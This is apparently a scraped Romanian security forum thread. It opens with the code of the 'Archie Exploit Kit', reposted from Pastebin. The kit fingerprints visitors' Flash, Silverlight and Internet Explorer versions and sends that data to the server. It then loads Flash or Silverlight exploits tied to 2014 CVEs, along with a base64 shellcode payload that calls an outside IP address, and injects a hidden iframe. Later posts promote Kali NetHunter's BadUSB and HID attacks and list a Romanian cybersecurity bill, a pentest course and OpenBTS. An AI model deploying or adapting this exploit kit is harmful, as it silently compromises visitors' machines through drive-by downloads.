"/OiiAAAAYInlMdJki1Iwi1IMi1IUi3IoUotSEItCPItEAniFwHRIAdBQi0gYi1ggAdPjOkmLNIsB1jH/McCshMB0B8HPDQHH6/Q7fSR141iLWCQB02aLDEuLWBwB04sEiwHQiUQkIFphWVpR/+BYWosS66FqQGgAEAAAaAAEAABqAGhUyq+R/9XDicjB6QLypYjBgOED8qTDMcBQUFFTUGg2Gi9w/9XDXWhvbgAAaHVybG1UaI5ODuz/1ei0////UFBoBAEAAGgzyopb/9VQi3QkBAHGsGWIBkawLogGRrBkiAZGsGyIBkawbIgGRrAAiAbrIotMJAiLHCRR6Jj///9ojk4O7P/VaJg6AABosEkt2//V6yHo2f///2h0dHA6Ly8xNDQuNzYuMzYuNjc6ODA4My9kZABYWFhYWMOQkJA="; 20 21 function spanAppend(val) 22 { 23 var a = document.createElement("span"); 24 document.body.appendChild(a); 25 a.innerHTML = val; 26 } 27 28 function flashLow() 29 { 30 spanAppend('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /><param name="movie" value="flashlow.swf" /><param name="allowScriptAccess" value="always" /><param name="FlashVars" value="id='+payload+'" /><param name="Play" valu e="true" /></object>'); 31 } 32 33 function flashHigh() 34 { 35 spanAppend('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="1" height="1" id="23kjsdf"><param name="movie" value="flashhigh.swf" /><param name="FlashVars" value="sh='+payload2+'" /></object>'); 36 } 37 38 function silverHigh() 39 { 40 spanAppend('<form id="form1" runat="server" ><div id="silverlightControlHost"><object data="data:application/x-silverlight-2," type="application/x-silverlight-2" width="100%" height="100%"><param name="source" value="silverapp1.xap"/><param name="background" value="white" /><param name="InitParams" value="payload='+p ayload3+'" /></object></div></form>'); 41 } 42 43 function fV(val) 44 { 45 return PluginDetect.isMinVersion("Flash", val); 46 } 47 48 function sV(val) 49 { 50 return PluginDetect.isMinVersion("Silverlight", val); 51 } 52 53 function ie(turl) 54 { 55 w = "frameBorder"; 56 r = "width"; 57 q = "iframe"; 58 s = "height"; 59 z = "createElement"; 60 c = "src"; 61 g = '10'; 62 hh = turl; 63 ha = document.createElement(q); 64 ha[w] = '0'; 65 ha[r] = g; 66 ha[s] = g; 67 b = ha[c] = hh; 68 document.body.appendChild(ha); 69 return; 70 } 71 72 function ieVerOk() 73 { 74 t = "test"; 75 try { 76 j = window.navigator.userAgent.toLowerCase(); 77 x = /MSIE[\/\s]\d+/i [t](j); 78 m = /Win64;/i [t](j); 79 z = /Trident\/(\d)/i [t](j) ? parseInt(RegExp.$1) : null; 80 if (!m && x && z && (z == 6 || z == 5 || z == 4)) { 81 return true 82 } 83 } catch (exc) {} 84 return false 85 } 86 87 function ieVer() { 88 t = "test"; 89 try { 90 if (window.msCrypto) 91 return 11; 92 if (window.atob) 93 return 10; 94 if (document.addEventListener) 95 return 9; 96 if (window.JSON && document.querySelector) 97 return 8; 98 if (window.XMLHttpRequest) 99 return 7; 100 } catch (exc) { } 101 return 0 102 } 103 104 function arch() { 105 try 106 { 107 var xmlDoc = new ActiveXObject("Microsoft.XMLDOM"); 108 xmlDoc.async = false; 109 xmlDoc.loadXML('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "res://c:\\Program Files (x86)\\Internet Explorer\\iexplore.exe">'); 110 if (xmlDoc.parseError.errorCode == -2147023083) 111 { 112 return 64; 113 } 114 } 115 catch (ex) 116 { 117 return 0; 118 } 119 return 32; 120 } 121 122 var flashVer = PluginDetect.getVersion("Flash"); 123 var Branch = 0; 124 if (flashVer == "11,0,1,152" 125 || flashVer == "11,1,102,55" || flashVer == "11,1,102,62" 126 || flashVer == "11,1,102,63" || flashVer == "11,2,202,228" 127 || flashVer == "11,2,202,233" || flashVer == "11,2,202,235") 128 Branch = 1; 129 130 131 if (fV("11,3,300,257") == 1 && (fV("11,7,700,276") == -0.1)) 132 Branch = 2; 133 if (fV("11,8,800,94") == 1 && (fV("13,0,0,183") == -0.1)) 134 Branch = 2; 135 136 var silverVer = PluginDetect.getVersion("Silverlight"); 137 var silverBranch = 0; 138 if (sV("4,0,50401,0") == 1 && sV("5,1,10412,0") == -0.1) 139 silverBranch = 1; 140 141 142 var adoberVer = PluginDetect.getVersion("AdobeReader"); 143 var adoberBranch = 0; 144 145 var archSys = arch(); 146 var ieVersion = 0; 147 if (archSys != 0) 148 ieVersion = ieVer(); 149 150 var sendstr = ""; 151 sendstr += encodeURI("dump=" + flashVer + "|" + silverVer + "|" + adoberVer + "|" + archSys + "|" + ieVersion + "|" + Branch); 152 sendstr += encodeURI("&ua=" + window.navigator.userAgent); 153 sendstr += encodeURI("&ref=" + document.referrer); 154 155 if (Branch == 0 && silverBranch == 1) 156 Branch = 3; 157 if (Branch == 0 && archSys != 0) 158 Branch = 4; 159 160 try 161 { 162 var xmlhttp = new XMLHttpRequest(); 163 xmlhttp.open("POST", "/foo", false); 164 xmlhttp.send(sendstr); 165 } 166 catch (exc){} 167 168 169 switch (Branch) 170 { 171 //2014-0497 172 case 1: 173 flashLow(); 174 break; 175 176 //2014-0515 177 case 2: 178 flashHigh(); 179 break; 180 181 case 3: 182 silverHigh(); 183 break; 184 185 case 0: 186 case 4: 187 //var avar = archSys == 32 ? 0 : 1; 188 //ie("/phazar.html?a="+avar); 189 190 ie("/iebasic.html"); 191 break; 192 } 193 194 195 </script> 196 </html> Sursa: Archie Exploit Kit - Pastebin.com
-
Kali Linux Nexus NetHunter The Kali Linux NetHunter project is the first Open Source Android penetration testing platform for Nexus devices, created as a joint effort between the Kali community member “BinkyBear” and Offensive Security. NetHunter supports Wireless 802.11 frame injection, one-click MANA Evil Access Point setups, HID keyboard (Teensy like attacks), as well as BadUSB MITM attacks – and is built upon the sturdy shoulders of the Kali Linux distribution and toolsets. Whether you have a Nexus 5, Nexus 7, or Nexus 10, we’ve got you covered. Our freely downloadable images come with easy to follow installation and setup instructions to get you up and running in no time at all. 802.11 Wireless Injection and AP mode support with multiple supported USB wifi cards. Capable of running USB HID Keyboard attacks, much like the Teensy device is able to do. Supports BadUSB MITM attacks. Plug in your Nethunter to a victim PC, and have your traffic relayed though it. Contains a full Kali Linux toolset, with many tools available via a simple menu system. USB Y-cable support in the Nethunter kernel – use your OTG cable while still charging your Nexus device! Software Defined Radio support. Use Kali Nethunter with your HackRF to explore the wireless radio space. Configure and build your NetHunter image from scratch. It’s completely open-source. The Advanced HID keyboard is like a Teensy device but you can SSH to it over 3G. The BadUSB attack is jaw dropping. Connect NetHunter to a USB port and become the default gateway. Open Source, Based on Kali Linux As an experienced penetration tester or security professional, it is imperative that you trust the tools you work with. One way to achieve this trust is by having full transparency and familiarity with the code you are running. You are free to read, investigate, and change our build scripts for the NetHunter images. All of this goodness from the house of Offensive Security and developers of Kali Linux! HID Keyboard and ‘BadUSB’ Attacks Our NetHunter images support programmable HID keyboard attacks, (a-la-teensy), as well as “BadUSB” network attacks, allowing an attacker to easily MITM an unsuspecting target by simply connecting their device to a computer USB port. In addition to these built in features, we’ve got a whole set of native Kali Linux tools available for use, many of which are configurable through a simple web interface. Configuration Management The Kali NetHunter configuration interface allows you to easily configure complex configuration files through a local web interface. This feature, together with a custom kernel that supports 802.11 wireless injection and preconfigured connect back VPN services, make the NetHunter a formidable network security tool or discrete drop box – with Kali Linux at the tip of your fingers wherever you are! DownloadsSetup Guide Running the Evil AP “Mana” Toolkit by Sensepost is as simple as clicking a single button. Although running on Android, I love how you can just VNC into Kali, and use all the tools you are used to. I switched on my NetHunter and was immediately surrounded by beautiful women, it was amazing. Sursa: http://www.kali.org/kali-linux-nethunter/
-
Proiect de lege privind securitatea cibernetică a României
Nytro replied to Nytro's topic in Stiri securitate
Parerea mea: o alta gaura neagra pentru banii publici. -
Proiect de lege privind securitatea cibernetic? a României Num?r de înregistrare Senat: L580/2014 Link pentru acces rapid la documentul legislativ: Senatul României - Fi?? senator Adresa: plx263/2014 Prima camer?: Camera Deputa?ilor Tip ini?iativ?: Proiect de lege Ini?iatori: Guvernul României Num?r de articole: 33 Avizul Consiliului Legislativ: 513/05.05.2014 Procedura de urgen??: Nu Stadiu: în lucru, la comisiile permanente ale Senatului Caracterul legii: Organic? Opiniile persoanelor interesate asupra propunerilor legislative aflate în consultare public?: Opinii trimise Derularea procedurii legislative: Data Ac?iunea 16-09-2014 adoptat de Camera Deputa?ilor 19-09-2014 Înregistrat la Senat pentru dezbatere cu nr.b513 (adresa nr.plx263/16/09/2014) 22-09-2014 cu nr.L580 prezentare în Biroul permanent; Senatul este Camer? decizional? 22-09-2014 trimis pentru raport la Comisia pentru ap?rare, ordine public? ?i siguran?? na?ional? (TERMEN: 24/09/2014) - adresa de înaintare a ini?iativei legislative pentru dezbatere - forma ini?iatorului - expunerea de motive la ini?iativa legislativ? - avizul Consiliului Legislativ - hot?rârea de Guvern - adresa prin care ini?iativa legislativ? e transmis? la cealalt? Camer? spre dezbatere - forma adoptat? de Camera Deputa?ilor Adoptata de Camera Depulatilor: http://www.senat.ro/legis/PDF%5C2014%5C14L580FC.pdf Sursa: Senatul României - Fi?? senator
-
Si cine va implementa asa ceva?
-
https://www.techdirt.com/articles/20130723/12395923907/even-powering-down-cell-phone-cant-keep-nsa-tracking-its-location.shtml FBI taps cell phone mic as eavesdropping tool - CNET News
-
The main focus of this course is to teach you the following skills: Gather Information Intelligence Find Web Applications and System Security Vulnerabilities Scan Your Target Stealthily Exploit Web Applications and System Vulnerabilites Conduct Real World Client Side Attacks Conduct Tactical Post Exploitation on Windows and Linux Systems Develop Windows Exploits [h=3]The Course[/h] The course covers 8 modules: Module 1: Solid Introduction to Penetration Testing Module 2: Real World Information Intelligence Techniques Module 3: Scanning and Vulnerability Assessment Module 4: Network Attacking Techniques Module 5: Windows – Unix Attacking Techniques Module 6: Windows – Unix Post-exploitation Techniques Module 7: Web Exploitation Techniques Module 8: Windows Exploit Development Am gasit aici: CODENAME: Samurai Skills - Real World Penetration Testing Training - Darknet - The Darkside Pare interesant.
-
Pentru cei interesati: OpenBTS | Open Source Cellular Infrastructure